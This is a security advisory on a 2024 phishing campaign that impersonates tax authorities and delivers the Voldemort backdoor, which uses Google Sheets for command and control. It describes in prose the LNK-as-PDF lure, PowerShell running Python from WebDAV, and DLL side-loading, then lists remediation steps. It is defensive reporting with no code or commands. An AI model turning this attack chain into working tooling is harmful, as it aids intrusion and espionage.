In August 2024, cybersecurity experts uncovered a sophisticated malware campaign that uniquely exploits Google Sheets as a command-and-control (C2) platform. First detected on August 5, 2024, this campaign targets over 70 organizations across a wide range of industries, such as insurance, aerospace, academia, finance, healthcare, government, and more. The attackers, whose identities remain unknown, have launched the campaign by sending around 20,000 phishing emails, cleverly disguised as communications from tax authorities in countries including the U.S., U.K., France, Germany, Italy, India, and Japan. These emails are crafted to deceive recipients into believing they contain important updates about tax filings, enticing them to click on malicious links. Once clicked, these links redirect users to an intermediate landing page that determines if the user’s operating system is Windows. If so, the page employs the search-ms: URI protocol handler to deliver a malicious Windows shortcut (LNK) file masked as a PDF using Adobe Acrobat Reader icons. When this LNK file is executed, it triggers PowerShell to run Python.exe from a remote WebDAV share, dynamically loading a Python script that executes directly from the share without being downloaded. The script then collects system information, encodes it in Base64, and sends it to a domain controlled by the attackers. To maintain covertness, a decoy PDF is displayed to the user while a password-protected ZIP file is downloaded from OpenDrive. This ZIP archive contains a legitimate executable vulnerable to DLL side-loading and a malicious DLL named Voldemort, which further compromises the victim’s system. Voldemort, a custom backdoor, is written in C and is capable of gathering information and deploying additional payloads, with Google Sheets serving as a unique C2, data exfiltration, and command execution channel. The blend of advanced and rudimentary techniques employed in this campaign has led researchers to suggest that, while it exhibits traits typical of advanced persistent threats (APTs), it also incorporates methods commonly used in cybercrime, creating a hybrid threat profile.

Targeted Sectors and Scope of Attack

The malware campaign targets a diverse range of sectors, including:

• Insurance
• Aerospace
• Transportation
• Academia
• Finance
• Technology
• Industrial
• Healthcare
• Automotive
• Hospitality
• Energy
• Government
• Media
• Manufacturing
• Telecom
• Social Benefit Organizations

The campaign is suspected to be a form of cyber espionage, though it has not yet been attributed to any specific named threat actor. So far, approximately 20,000 phishing emails have been dispatched as part of the attacks, demonstrating a significant scale of operation.

Phishing Tactics and Initial Infection Vector

The phishing emails are crafted to appear as though they originate from tax authorities in countries such as the U.S., the U.K., France, Germany, Italy, India, and Japan. These emails inform recipients about purported changes to their tax filings and urge them to click on Google AMP Cache URLs, which redirect users to an intermediate landing page.

The landing page then inspects the User-Agent string to determine if the operating system is Windows. If Windows is detected, the page uses the search-ms: URI protocol handler to display a Windows shortcut (LNK) file. This LNK file masquerades as a PDF document using Adobe Acrobat Reader, tricking the victim into launching it.

Attack Vector and Payload Delivery

The phishing emails are designed to mimic official tax authorities, urging recipients to review changes to their tax filings. Victims are lured into clicking on Google AMP Cache URLs, which redirect them to a landing page that inspects the User-Agent string. If the operating system is identified as Windows, the page triggers the search-ms: URI protocol handler to display a Windows shortcut (LNK) file. This LNK file is disguised as a PDF document using Adobe Acrobat Reader icons to deceive users.

Upon execution of the LNK file, PowerShell is invoked to run Python.exe from a remote WebDAV share. The Python script is passed as an argument from another WebDAV share, causing it to execute without downloading any files locally. Dependencies are loaded directly from the WebDAV share, enabling the malware to gather system information and send it back to the attackers in a Base64-encoded format.

Decoy and Additional Payloads

After executing the initial payload, the malware displays a decoy PDF to the user to maintain the illusion of legitimacy. Simultaneously, it downloads a password-protected ZIP file from OpenDrive, which contains a legitimate executable named “CiscoCollabHost.exe” and a malicious DLL file “CiscoSparkLauncher.dll.” The malicious DLL, named Voldemort by researchers, is sideloaded to exploit the legitimate executable and further infiltrate the victim’s system.

Payload Components and Post-Exploitation Activities

The downloaded ZIP archive contains two files:

1. CiscoCollabHost.exe: A legitimate executable vulnerable to DLL side-loading.
2. CiscoSparkLauncher.dll: A malicious DLL (known as Voldemort) that is sideloaded by the executable.

Voldemort is a custom backdoor written in C, capable of gathering information and loading next-stage payloads. The malware leverages Google Sheets for its C2 communication, data exfiltration, and executing commands sent by the operators.

The Voldemort Backdoor

Voldemort, a custom backdoor written in C, is equipped with capabilities for information gathering and loading additional payloads. What makes this campaign particularly unusual is its use of Google Sheets for C2, data exfiltration, and executing commands from the attackers. This approach is a departure from more traditional C2 methods, reflecting the attackers’ creativity and adaptability.

Attribution and Threat Assessment

While the campaign’s sophistication suggests alignment with advanced persistent threats (APT), the tactics employed—such as abusing file schema URIs and leveraging WebDAV and SMB for malware staging—are also popular in the cybercrime landscape. This duality has led researchers to describe the campaign as having “cybercrime vibes” despite its potential espionage objectives.

The threat actors behind this campaign have yet to be identified. However, Proofpoint was able to examine the contents of the Google Sheets used in the campaign, revealing six victims, including one believed to be a security researcher or sandbox environment.

Remediation Steps

1. Block Malicious URLs: Implement URL filtering to block access to known malicious Google AMP Cache URLs and other suspicious domains.
2. Monitor Network Traffic: Use network monitoring tools to detect unusual outbound traffic, especially to Google Sheets and WebDAV shares.
3. Disable Search Protocol Handlers: Disable or restrict the use of the search-ms: URI protocol handler on Windows systems to prevent exploitation.
4. Restrict PowerShell Execution: Enforce restrictive PowerShell execution policies to prevent unauthorized script execution.
5. Inspect User-Agent Strings: Monitor and inspect User-Agent strings in network traffic to detect and block suspicious activities.
6. Enhance Email Security: Deploy advanced email filtering and phishing protection to identify and block emails impersonating tax authorities.
7. Patch and Update Software: Regularly update all software, especially commonly exploited applications like Adobe Acrobat Reader and Python, to minimize vulnerabilities.